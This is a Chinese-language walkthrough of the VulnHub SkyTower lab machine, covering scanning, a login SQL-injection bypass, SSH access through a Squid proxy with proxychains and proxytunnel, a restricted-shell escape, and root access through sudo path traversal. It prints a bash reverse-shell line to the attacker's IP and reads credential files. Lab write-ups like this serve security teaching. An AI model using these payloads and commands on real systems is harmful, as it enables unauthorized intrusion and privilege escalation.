vulnhub靶场之SkyTower【天空塔】靶机

admin 2025年3月12日10:13:19评论6 views字数 4564阅读15分12秒阅读模式

前言

靶机:skytower靶机,IP地址为192.168.10.10

攻击:kali,IP地址为192.168.10.6

靶机采用virtualbox虚拟机,攻击机采用VMware虚拟机,都采用桥接网卡模式

文章涉及的靶机及工具,都可以自行访问官网或者项目地址进行获取,或者通过网盘链接下载 https://pan.quark.cn/s/75766d517927

主机发现

也就是相当于现实环境中去发现确定主机的ip地址,因为这里是靶机环境,所以跳过了从域名到ip地址的过程。

使用arp-scan -l或者netdiscovery -r 192.168.10.1/24

当然也可以使用nmap等工具进行

arp-scan -l
vulnhub靶场之SkyTower【天空塔】靶机

信息收集

使用nmap扫描目标端口等信息

首先扫描目标的tcp端口的开放情况

nmap -sT --min-rate=1000 192.168.10.10 -p- -oA nmap-tcp
vulnhub靶场之SkyTower【天空塔】靶机

再扫描udp端口的开放情况

nmap -sU --min-rate=1000 192.168.10.10 --top-ports 20 -oA nmap-udp
vulnhub靶场之SkyTower【天空塔】靶机

可以看到明确开放的udp端口没有,所以下面对tcp端口进行一个筛选,这里因为22端口并不是明确closed的,是filtered的,所以也要包括在内

ports=`grep /tcp nmap-tcp.nmap | awk -F'/' '{print $1}' | paste -sd ','`
vulnhub靶场之SkyTower【天空塔】靶机

进一步对这些端口进行服务、系统等探测

nmap -sV -O -sC 192.168.10.10 -p $ports --min-rate=1000
vulnhub靶场之SkyTower【天空塔】靶机

再使用nmap的漏洞检测脚本对这些端口进行探测

nmap --script=vuln 192.168.10.10 -p $ports
vulnhub靶场之SkyTower【天空塔】靶机

网站信息探测

访问80端口的网站,进一步进行收集

vulnhub靶场之SkyTower【天空塔】靶机

访问发现就是一个登录框,访问页面源代码没有信息泄露。

对于登录框,可以采用注入、爆破等方式,目前是信息收集,暂且不测试

使用浏览器插件wappalyzer查看站点的一些详细配置

vulnhub靶场之SkyTower【天空塔】靶机

既然有php语言,那么爆破一下网站目录,使用gobuster、ffuf、dirb、dirsearch等工具

gobuster dir -u http://192.168.10.10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -b 403-404 -x php,html,txt
vulnhub靶场之SkyTower【天空塔】靶机

扫描结果来看,并没有有效的一些目录

访问3128端口查看,页面源代码中也没有信息泄露

vulnhub靶场之SkyTower【天空塔】靶机

漏洞寻找及利用

回到之前网站的登录框,尝试进行注入等操作,测试有无可利用

以常用的万能密码进行测试

#邮箱出输入这个admin' or 1=1--+#密码随便输入
vulnhub靶场之SkyTower【天空塔】靶机

根据这个可以知道,过滤了某些东西,输入的是1=1--+变成了11+,并且or也没有。再测试and发现也是一样的,对--注释,以及and、or、=过滤了

那么其sql语句大概是这样的

select * fromtablewhere email='$eamil'andpassword='$password'

mysql中可以使用||、&代替orand,如下:

vulnhub靶场之SkyTower【天空塔】靶机

那么尝试一下,这些符号有没有被过滤,顺提一下,#也可以表示注释的

#邮箱出输入这个admin' || 1##密码随便输入
vulnhub靶场之SkyTower【天空塔】靶机

获取到用户名john和密码hereisjohn了,并且这里还提示了,使用ssh

不过前面在扫描的时候也知道了,22端口的ssh服务是已经被过滤的,也就是直接访问是不行的。

proxychains4配置链

3128端口是一个代理服务器,并且我尝试的时候,并没有阻止我使用它作为代理去访问80端口。

也就是,大概是这样的一个图,自己画的,别介意

vulnhub靶场之SkyTower【天空塔】靶机

那么配置proxychain4.conf配置文件,指向这个代理服务器,然后再尝试ssh登录

vim /etc/proxychains4.conf

文件的末尾添加一行指向3128目标端口的地址即可

vulnhub靶场之SkyTower【天空塔】靶机

那么尝试使用proxychains4的链,配合squid代理进行访问

proxychains4 ssh [email protected]#密码就是前面网站获取的hereisjohn
vulnhub靶场之SkyTower【天空塔】靶机

这里可以看到确实是连接了,但是进入之后立马退出了,测试一下能否执行命令

proxychains4 ssh [email protected] "ls -la"
vulnhub靶场之SkyTower【天空塔】靶机

不过还是使用proxytunnel进行隧道代理

proxytunnel隧道代理

可以使用-h查看具体的帮助

proxytunnel 是一个用于通过 HTTP 代理服务器建立 TCP 连接的工具

-p 是 proxytunnel 用于指定代理服务器地址和端口的参数-d 用于指定目标服务器的地址和端口-a 用于指定 proxytunnel 本地监听的端口

然后搭建即可

proxytunnel -p 192.168.10.10:3128 -d 127.0.0.1:22 -a 1234#注意,这里的-d 127.0.0.1:22#是通过代理服务器,然后代理服务器请求的127.0.0.1,也就是在同一机器内#若不是同一机器的话,需要指定具体的ssh服务的ip地址
vulnhub靶场之SkyTower【天空塔】靶机

不过从结果来看,还是自动退出了

之前查看当前目录下的文件,发现.bashrc,那么可能就是rbash,其做了限制,导致自动退出

那么查看这个文件

ssh [email protected] -p 1234 "cat .bashrc"
vulnhub靶场之SkyTower【天空塔】靶机

可以看到在文件的最后,有一个语句的输出,以及exit退出

在前面登录john时,有这个输出Funds have been withdrawn,说明这里是执行了这个,并且exit生效,导致连接后自动退出

rbash配置文件修改

前面执行ls -al时,也看到了这个文件的所有者是john,并且是可以修改的,那么可以尝试修改这个文件,或者删除这个文件

ssh [email protected] -p 1234 "mv .bashrc .bashrc.bak"
vulnhub靶场之SkyTower【天空塔】靶机

这时候再次使用ssh连接进行测试

vulnhub靶场之SkyTower【天空塔】靶机

靶机内信息收集

查看当前系统有哪些用户,有三个用户

ls -la /homecat /etc/passwd | grep /bin/bash
vulnhub靶场之SkyTower【天空塔】靶机

查看网络状态

ip addss -antulpnetstat -antulp
vulnhub靶场之SkyTower【天空塔】靶机

这里可以看到,还有数据库的开放,3306的mysql默认端口

查看进程

ps aux | grep roottop
vulnhub靶场之SkyTower【天空塔】靶机

查看定时任务

crontab -lcat /etc/crontabatq
vulnhub靶场之SkyTower【天空塔】靶机

查看内核版本和系统版本

uname -auname -rcat /etc/issuecat /etc/*releaselsb_release
vulnhub靶场之SkyTower【天空塔】靶机

使用find寻找其他用户具有写权限的文件,以及寻找具有SUID权限的文件

find / -type f -perm /o+w 2>/dev/null | grep -v /procfind / -perm -4000 -print 2>/dev/null
vulnhub靶场之SkyTower【天空塔】靶机

使用sudo -l,发现john用户并没有可执行的

vulnhub靶场之SkyTower【天空塔】靶机

查看连接数据库的信息,也就是网站连接数据库的具体信息

cat /var/www/login.php
vulnhub靶场之SkyTower【天空塔】靶机

那么连接数据库查看有无信息,并且可以看到这里是root连接,说明可能存在高权限,并且可能udf提权

mysql -uroot -proot
vulnhub靶场之SkyTower【天空塔】靶机

查看数据,发现与三个本地用户相同的邮箱,并且密码未加密

vulnhub靶场之SkyTower【天空塔】靶机

那么可能的用户名和密码猜测如下

用户名
密码
john
hereisjohn
sara
ihatethisjob
william
senseable

查看数据库的安全信息,查看是否可能有udf提权的可能性

vulnhub靶场之SkyTower【天空塔】靶机
vulnhub靶场之SkyTower【天空塔】靶机

测试gcccc有无安装,查看版本,但是并没有安装,所以这个编译的话可能不行

gcc -vcc -v

这里是基本的信息,还没有上传脚本进行检测

提权

这里需要注意,现在所作的一切操作,都是在通过代理服务器进行的,若想要稳固连接,需要一个反向shell,也就是靶机主动连接kali,这样就不会被防火墙拦截

#在靶机上执行bash -i >& /dev/tcp/192.168.10.6/9999 0>&1#当然还有其他的,如nc,脚本语言等

不过这种方式在代理断掉的时候,就会断开,我尝试写一个脚本,然后使其一直执行,但是不知道为什么,直接写入文件的形式不行,尝试下载也不行,并且还是在/tmp目录下,一直提示写入失败

-bash: echo: write error: No space left on device

在执行了df -h命令发现,磁盘都满了,啧,这就难搞了。

反正大概知道思路就可以了,这里就是通过脚本的形式来防止连接断开

提权至sara

尝试使用su切换到sara,密码为上面的数据库中的密码ihatethisjob

当然测试过另一个,只有这个可以,不过这里切换发现,还是有限制

vulnhub靶场之SkyTower【天空塔】靶机

那么和之前一样,在切换的时候执行一个命令,查看其目录

su sara -c "ls -la /home/sara"
vulnhub靶场之SkyTower【天空塔】靶机

查看.bashrc文件,是否与其有关

su sara -c "cat /home/sara/.bashrc"
vulnhub靶场之SkyTower【天空塔】靶机

那么可以与之前一样,把这个文件给它改了,因为sara有写权限的

#这里因为靶机磁盘满了,所以下面的修改不能成功su sara -c "sed -i 's/exit/g/' /home/sara/.bashrc"#采用mv更改名称,使得其无法找到.bashrc文件,这样就无法生效了su sara -c "mv /home/sara/.bashrc /home/sara/.bashrc.bak"
vulnhub靶场之SkyTower【天空塔】靶机

再次切换到sara用户,即可成功

vulnhub靶场之SkyTower【天空塔】靶机

提权至root

执行sudo -l发现,当前用户sara有几个可执行的文件

vulnhub靶场之SkyTower【天空塔】靶机

可以看到,是允许查看/accounts目录下的所有,不过查看后,发现这个目录下什么都没有

不过这是有sudo的,这里就需要了解一点,...是在目录包含之内的

vulnhub靶场之SkyTower【天空塔】靶机

那么就可以构造命令,使得可以查看其他文件

sudo /bin/ls /accounts/../rootsudo /bin/cat /accounts/../root/flag.txt
vulnhub靶场之SkyTower【天空塔】靶机

这里给出了root的密码theskytower

且这里可以越权查看其他文件

vulnhub靶场之SkyTower【天空塔】靶机

总结

虽然该靶机的时间有点久远,不过还是有几点值得思考:

  1. 网站的sql注入,其主要就是执行sql语句,那么sql中可以执行的,在网站注入都是可行的。
  2. squid代理服务器,若是别的机器可以通过这个代理服务器,并且能够成功使用的话,就可以借助其所在的网段进行操作,就可以绕过防火墙的限制
  3. proxychains4代理链的配置,这里就是借助这个然后测试ssh连接
  4. proxytunnel隧道搭建,当确定需要使用代理的时候,可以借助这个工具,搭建一个隧道,使得访问更便捷
  5. rbash的配置文件,名称为.bashrc,一般在用户的主目录下会有该文件,这个配置可以限制用户登录时的一些操作,这里的逃逸是经过ssh连接与su切换的时候,可以执行一条命令,使得更改.bashrc文件,使得无法找到该文件的时候,逃逸成功
  6. 靶机内的信息收集,要全面,这里就是数据库与系统账户的一码多用
  7. 提权方式考察的其实是linux的目录构造,每一个目录下都是有...的,当对一个目录下的所有文件具有sudo ls/cat权限的时候,这两个都是该目录下的,所以越级目录访问是可以的

.是当前目录,..是上一级目录

原文始发于微信公众号(泷羽sec-何生安全):vulnhub靶场之SkyTower【天空塔】靶机

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月12日10:13:19
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub靶场之SkyTower【天空塔】靶机https://cn-sec.com/archives/3831654.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息